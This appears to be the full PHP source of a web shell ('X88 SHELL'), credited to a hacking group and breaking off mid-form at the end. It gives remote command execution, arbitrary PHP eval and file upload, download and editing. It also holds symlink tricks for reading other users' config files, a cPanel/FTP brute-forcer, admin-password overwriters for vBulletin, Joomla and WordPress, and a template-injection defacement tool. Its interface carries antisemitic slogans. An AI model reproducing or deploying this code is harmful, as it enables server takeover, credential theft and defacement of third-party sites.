Code:
<?php $fdownload=$_GET['fdownload']; if ($fdownload <> "" ){ $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } echo '<center><img border="0" src="http://www4.0zz0.com/2011/04/12/18/491768547.jpg"><body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff">'; echo "</center><font color=white size=3>PHP Is :</font>"; echo "<html> <font color=c0c0a0 size=3>"; echo phpversion(); echo "</font>"; echo "<br>"; if(@ini_get("safe_mode")){$safe_m="<font color='red'>ON <font/> ";}else{$safe_m="<font color='green'>OFF <font/> ";} echo " <font size=3><center> </center>"; echo "</center><font color=white size=3>SafeMode : [ $safe_m <font color=white size=3>]"; echo "<center><font color=red size=9></font></center>"; echo "<font color='white'>Server:</font><font color='#DCE7EF' size='1' face='Arial'>"; echo "</font><font color='#DCE7EF' size='3' face='Arial'>"; echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); echo"</font></font><style type='text/css'>body{cursor: crosshair;}</style>"; $xm8 = @ini_get("open_basedir"); if ($xm8 or strtolower($xm8) == "<font color='red'>[ON]") {$openbasedir = true; $hopenbasedir = "<font color='red' size='3'>".$xm8."</font>";} else {$openbasedir = false; $hopenbasedir = "<font color='green'>[OFF] - not secure</font>";} echo("<br>"); echo("<font color='white'>Open Base Dir: $hopenbasedir</font>"); echo("<font color=white><br>"); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<font color='#00ffff' size=4> \ </font>"); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<font color='#00ffff' size=4> \ </font>"); echo "MySQL: <b>"; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b><font color='white'>"; } echo "<br>"; echo "Oracle: <b>"; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "<font color=#008000>On</font>";}else{echo "<font color=red>OFF</font>";} echo "</b>"; echo "<br>Disable Functions: <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} echo "<br>Register globals: <b>"; $reg_g = @ini_get("register_globals"); if($reg_g){ echo "<b><font color=#008000>ON</font>"; } else { echo "<b><font color=red>OFF</font>"; } echo "</b></b></b>"; error_reporting(0); $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_GET['p']) && $_GET['p'] == "about") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET['dir'])) { chdir($_GET['dir']); } echo " <font size=3><center> </center>"; echo "</center><font size=3>"; echo "<font color=white>Uname -A = <font color=c08060>".php_uname()."</font>"; echo "<center><font size=3></center>"; echo "UID :<font color=a0ffff> ".@exec('id')."</font>"; print '<br>Your IP = <font color=red>'.@$_SERVER['REMOTE_ADDR'].' '.@$_SERVER['REMOTE_HOST'].'</font> '; echo " <center> </center>"; $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])." </font>[</span><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>]"; echo '<a href=?><center><font color="red"><b>[</b><font color="green" size=4> home <font color="red"><b>]</b></font><a>'; $pages = array( 'cmd' => '<center><font color="red"><b>[</b><font color="c0ff00"> Command <font color="red"><b>]</b></font>', 'eval' => '<font color="red"><b>[</b><font color="c0ff00"> Eval Code <font color="red"><b>]</b></font>', 'mysql' => '<font color="red"><b>[</b><font color="c0ff00"> MySQL Query <font color="red"><b>]</b></font>', 'chmod' => '<font color="red"><b>[</b><font color="c0ff00"> Chmod File <font color="red"><b>]</b></font>', 'phpinfo' => '<font color="red"><b>[</b><font color="c0ff00"> PHPinfo <font color="red"><b>]</b></font>', 'cpanelftp' => '<font color="red"><b>[</b><font color="c0ff00"> Cpanel,FTP تخمين <font color="red"><b>]</b></font>', 'upload' => '<font color="red"><b>[</b><font color="c0ff00"> Upload File-Upload File From URL<font color="red"><b>]</b></font>', 'uuuuuusers' => '<font color="red"><b>[</b><font color="c0ff00"> Users <font color="red"><b>]</b></font>', 'symlink' => '<font color="red"><b>[</b><font color="c0ff00"> SymLink <font color="red"><b>]</b></font><center>', 'scahlf' => '<font color="red"><b>[</b><font color="c0ff00"> show_source & highlight_file <font color="red"><b>]</b></font>', 'vbhack' => '<font color="red"><b>[</b><font color="c0ff00"> Vbulletin Hack Tools <font color="red"><b>]</b></font>', 'wpps' => '<font color="red"><b>[</b><font color="c0ff00"> WordPress Password Changer <font color="red"><b>]</b></font>', 'jpc' => '<font color="red"><b>[</b><font color="c0ff00"> Joomla Password Changer <font color="red"><b>]</b></font>', 'capff' => '<font color="red"><b>[</b><font color="c0ff00"> قاهر اليهود للمنتديات <font color="red"><b>]</b></font>', 'about' => '<font color="red"><b>[</b><font color="c0ff00"> About <font color="red"><b>]</b></font>' ); $header = '<html> <title>'.getenv("HTTP_HOST").' ~ X88 SHELL</title> <head> <style> td { font-size: 12px; font-family: verdana; color: #ffa080; background: black; } #d { background: #000060; } #f { background: #000060; } #s { background: #0000ff; } #d:hover { background: green; } #f:hover { background: red; } pre { font-size: 10px; font-family: verdana; color: #4080ff; font-size:8pt; } a:hover { text-decoration: none; } input,textarea,select { color: #ffffff; border: 1px dotted #ff4040; background-color: #000000; background: #000000; } hr { color: #ffff20; background-color: #ffff20; height: 5px; } </style> </head> <body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff"> <table width=100%><td id="header" width=100%> <p align=center> '; foreach($pages as $page => $page_name) { $header .= '<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a> '; } $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; print $header; $footer = '<font color="#60c0ff"><tr><td><hr><center><font color="red"><b>© <font color="lime">2011-2012 <font color="red">By : <font color="lime">ML7s-HackerS<font color="red"> & <font color="lime">Dr.Zero </center></td></table></body></head></html>'; if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Commander function function cmd() { $cmd = $_POST['cmd']; $cmdgo = $_POST['cmdgo']; $option = $_POST['option']; $id = $_GET['id']; if($cmdgo && !empty($cmd)) { switch($option) { case system: system($cmd); break; case passthru: passthru($cmd); break; case shell_exec: $out = shell_exec($cmd); echo $out; break; default; system($cmd); } } } echo "<form method=post action=''><font face='Courier New'> </font></pre><br><input size=32 style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option> <option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute> <textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>"; cmd(); echo "</textarea> </td></table></form>"; break; case 'delete': if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?<br> <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> <input type=hidden name=yes value=yes> <input type=submit value=\"Delete\"> "; } break; case 'capff': if(empty($_POST['index'])){ echo "<FORM method=\"POST\"> host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"> database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br> username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\"> password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br> <br> <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br> <INPUT value=\"Set\" name=\"send\" type=\"submit\"> </FORM>"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $index = $_POST['index']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}</textarea>"; $ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error()); if($ok){ echo "!! update finish !!<br><br>"; } } break; case 'symlink': if ($_GET[p]=="symlink"){ if ($_POST['o'] != "ok"){ print'<body bgcolor=#000000> <p align="center"><b><font color="yellow" size="4">SymLink</font></b></p> <p align="center"> <div align="center"> <form action="" method="POST" > <input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="usr" type="text" value="/home/user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br> <input type="hidden" name="o" value="ok"> <input type="submit" value=Submit style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"> </form></p> '; print $f; } else{ $sym = @symlink("$_POST[usr]","$_POST[my]"); print ' <body bgcolor=#000000> <p align="center"><b><font color="yellow" size="4">SymLink<br></font></b></p> <p align="center"> <p align="center"><b><font face="Pristina" size="4" color="#008000">'; if ($sym){ print 'Done !!</p> ';} else{print'Error<br>Cannot Be completed';} print $f; } exit; } break; case 'uuuuuusers': echo "<center><font color='red' size='7'>Users</font></center><textarea style=border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000 rows=12 name=usersx cols='23' >"; @system('ls /var/mail'); echo "</textarea>"; break; case 'jpc': if(empty($_POST['pwd'])){ echo "<FORM method=\"POST\"> host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"> database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br> username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\"> password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br> <br> Set A New username For Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br> Don`t Change it Password is : 123456: <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br> <INPUT value=\"change\" name=\"send\" type=\"submit\"> </FORM>"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "<b>Success :Now Use A New User And Password - (123456)"; } } break; case 'eval': echo " <form method=POST><table width='100%' height='72' border='0' id='Box'><tr> <td width='12' height='21' style='background-color:".$shellColor."'> </td> <tr><td height='45' colspan='2'> <input type='text' name='php_eval' size='70' value='echo \"Fuck 4 Israel\";'> <input type=submit name=submitEval value=Eval></td></tr></table></form>"; print "<h1>Output:</h1>"; print "<br> "; if($_POST['submitEval']) // Execute Eval Code . { $eval = @str_replace("<?php","",$_POST['php_eval']); $eval = @str_replace("<?php","",$eval); $eval = @str_replace("?>","",$eval); $eval = @str_replace("\\","",$eval); echo eval($eval); } break; case 'chmod': if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: <input type=text name=chmod value=\"".$content."\" size=70 style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'><br><b>New permission:</b> <select name='chvalue' style='color: #ffffff; border: 1px dotted #a0ff00; background-color: #000000'> <option value='777'>777</option> <option value='644'>644</option> <option value='755'>755</option> </select><input type=submit value='Change' style='color: #ffffff; border: 1px dotted #ff0000; background-color: #000000'>"; break; case 'mysql': if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!<br> <form action=\"".$me."?p=mysql\" method=POST> <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> <b>Username:<br><input type=text name=username value=\"root\" size=10><br> <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> <b>Query:<br></b<textarea name=query></textarea> <input type=submit value=\"Query database\"> </form> "; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'vbhack': $act = $_GET['act']; if($act=='reconfig' && isset($_POST['path'])) { $path = $_POST['path']; include $path; echo '<table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"><th><font color=green>::::Read Config Data::::</font></th><th>'; echo '<font color=yellow>' . $path . '</font></th>'; echo '<tr> <th><font color=green>Host : </font></th><th><font color=yellow>' . $config['MasterServer']['servername'] . '</font></th> </tr> <tr> <th><font color=green>User : </font></th><th><font color=yellow>' . $config['MasterServer']['username'] . '</font></th> </tr> <tr> <th><font color=green>Pass : </th><th>'; $passsql = $config['MasterServer']['password']; if ($passsql == '') { $result = '<font color=red>No Password</font>'; } else { $result = '<font color=yellow>' . $passsql . '</font>'; } echo $result; echo '</th> </tr> <tr> <th><font color=green>Name : </font></th><th><font color=yellow>' . $config['Database']['dbname'] . '</font></th> </tr> </table>'; } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset ($_POST['vbuser']) && isset($_POST['vbpass'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbpass = $_POST['vbpass']; mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>'); mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>'; $query = 'select * from user where username="' . $vbuser . '";'; $result = mysql_query($query); while ($row = mysql_fetch_array($result)) { $salt = $row['salt']; $x = md5($vbpass); $x =$x . $salt; $pass_salt = md5($x); $query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>'; } else { echo '<font size=3><font color=red>Failed to change PassWord</font></font>'; } } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>'); mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>'; echo '<hr color="#00FF00" /> <form name="changepass" action="?p=vbhack&act=psw" method="post"> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"> <th><font color=yellow>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th> <tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr> <tr><td>Pass : </td><td><input name="vbpass" value="DrZer0" /></td></tr> </table>'; echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">'; echo ' </form> <hr color="#00FF00" /> <form name="changepass" action="?p=vbhack&act=mail" method="post"> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"> <th><font color=yellow>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th> <tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr> <tr><td>MAIL : </td><td><input name="vbmail" value="DrZero@live.com" /></td></tr> </table>'; } if ($act == ''){ echo ' <form name="myform" action="?p=vbhack&act=login" method="post"> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"> <th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr> <tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr> <tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr> <tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr> </table> </form>'; } if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>'); mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>'; echo ' <hr color="#00FF00" />'; $re = mysql_query('select * from user'); echo'<table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"><th><font color=lime>ID</th><th><font color=lime>UserName</th><th><font color=lime>E-Mail</th><th><font color=lime>PassWord</th></font></font></font></font></font>'; while ($row = mysql_fetch_array($re)) { echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td><td>' . $row ['password'] . '</td></tr>'; } echo'</table>'; echo ' <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"><th>'; $count = mysql_num_rows($re); echo 'Number of users registered is : [ ' . $count . ' ]'; echo '</th></table>'; } if ($act == 'users'){ echo ' <form name="myform" action="?p=vbhack&act=lst" method="post"> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"> <th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr> <tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr> <tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr> <tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr> </table> </form>'; } if ($act=='config') { echo ' <form name="myform" action="?p=vbhack&act=reconfig" method="post"> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"> <th><font color=yellow>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th> <tr><td>PATH : </td><td><input name="path" value="/home/User/public_html/vb/includes/config.php" /></td></tr></table></form>'; } echo ' <center> <table border="1" bgcolor="#000000" bordercolor="lime" bordercolordark="lime" bordercolorlight="lime"><td><a href="?p=vbhack&act=users"><font color=red size=5>List Users</a></td><td><a href="?p=vbhack&act=config"><font color=red size=5>ReadConfig</a></td></tr></table>'; break; case 'cpanelftp': echo "</td></tr></table></form> </td> <td valign='top'> <!-- Cpanel And FTP BruteForce Attacker --> <form method=POST><table width='100%' height='72' border='0' id='Box'><tr> <center> <textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='users' cols='23' >"; @system('ls /var/mail'); echo "</textarea> <textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\nabc123\n112233\n332211\nasd123\nadmin123\npassword\npass123\nwebmaster\nadminpass</textarea> <center> <input type='text' name='target' size='16' value='localhost' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000'> <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy> <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy> <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000' > </td></tr></table></form> </td> <td valign='top'> "; if($_POST['BruteForceCpanelAndFTP']) { $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['BruteForceCpanelAndFTP']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if(empty($target)) { $target = "localhost"; } function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "Error : Connection Timeout Please Check The Target Hostname ."; exit; } elseif ( curl_errno($ch) == 0 ) { print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "[-] Connection Timeout Please Check The Target Hostname ."; exit; } elseif ( curl_errno($ch) == 0 ) { print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>"; } curl_close($ch); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "<b><font color=40c0ff>[-] Please Check The Users or Password List Entry . . ."; } if(empty($users)) { print "<b><font color=40c0ff>[-] Please Check The Users List Entry . . ."; } if(empty($pass)) { print "<b><font color=40c0ff>[-] Please Check The Password List Entry . . "; } $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "<b><font color=40c0ff>[~]# Cracking Process Started, Please Wait ..."; foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); if($cracktype == "ftp") { ftp_check($target,$pureuser,$purepass,$connect_timeout); } if ($cracktype == "cpanel") { cpanel_check($target,$pureuser,$purepass,$connect_timeout); } } } } } break; case 'phpinfo': phpinfo(); break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".<br> <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> <b>To:<br><input type=text name=filenew value=\"\" size=10><br> <input type=submit value=\"Rename file\"> </form>"; break; case 'scahlf': echo "<html> </td></tr></table><form method='POST' enctype='multipart/form-data' > </td></tr></table><form method='POST' enctype='multipart/form-data' > <br> <b>show_source : </b><input type='text' name='show' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p> <b>highlight_file : </b><input type='text' name='high' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p> <input type='submit'' value='Read' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></form</p> </form</p>"; if(empty($_POST['show'])) { } else { $s = $_POST['show']; echo "<b><h1><font size='4' color='silver'>show_source</font></h1>"; $show = show_source($s); } if(empty($_POST['high'])) { } else { $h = $_POST['high']; echo "<b><h1><font size='4' color='silver'>highlight_file</font></h1>"; echo "<br>"; $high = highlight_file($h); } break; case 'about': echo '<center> <font color="red" size="7">Ml7s-HackerS - Dr.Zero'; echo '<center> <font color="lime" size="4">Emails : <font color="yellow">XM8@HoTmAil.CoM , DrZero@Live.Com <center><font color="green">Everywhere and Anywhere, We Are There'; break; case 'upload': echo '</pre></form>'; if (isset($_POST['upload'])) { $savefile = getcwd()."/" . $_FILES['file']['name']['0']; move_uploaded_file($_FILES['file']['tmp_name']['0'], $savefile); $filesizename = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); $size = round($_FILES['file']['size']['0']/pow(1024, ($i = floor(log($_FILES['file']['size']['0'], 1024)))), 2) . $filesizename[$i];print "<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>" . $_FILES['file']['name']['0'] . "</b>.<br>Size: <b>" . $size . "</b>.";} echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>'; if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text']; $newfile=$_POST['rename']; if (!copy($file, $newfile)) {echo "failed to copy $file...\\n";}} echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>'; break; case 'edit': print'<body bgcolor=#000000> <p align="center">'; if($_POST[incl] != ""){ $file = @fopen($_POST[incl],r); $data=@fread($file,1546768); $msr = str_replace("\\\\","\\",$_POST[incl]); print '<form action="" method="POST"><br> <div align="center"><font size="4" color="#008000">Path : </font><input name="incl" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FF0033; background-color:#000000" value="'.$msr.'" align="LEFT" size="103" /> <br></form> <form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name="kr" style="border:1px dotted #CCFF00; width: 700px; height: 450px; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" >'.htmlspecialchars($data).'</textarea><br><input type="submit" value="Save">'; exit; } if($_POST[kr]){ $fl = str_replace("\'","'",$_POST[kr]); $fl = str_replace('\"','"',$fl); $fl = str_replace('\\\\','\\',$fl); $d = @fopen($_POST[incle], 'w'); @fwrite($d,$fl); @fclose($d); if($d){ print'<font size="4" color="#008000">Saved !!</font><br>'; exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>'; exit;}} print'<div align="center"> <form action="" method="POST"> <input name="incl" type="submit" value="'.$_GET['file'].'" align="LEFT" size="45" style="border:1px dotted #0080ff; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#80a0a0"/> <br> '; exit; break; case 'wpps': if(empty($_POST['pwd'])){ echo "<FORM method=\"POST\"> host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"> database : <INPUT size=\"15\" value=\"wp-\" name=\"database\" type=\"text\"><br> username : <INPUT size=\"15\" value=\"wp-\" name=\"username\" type=\"text\"> password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br> <br> Set A New username 4 Login : <INPUT name=\"admin\" 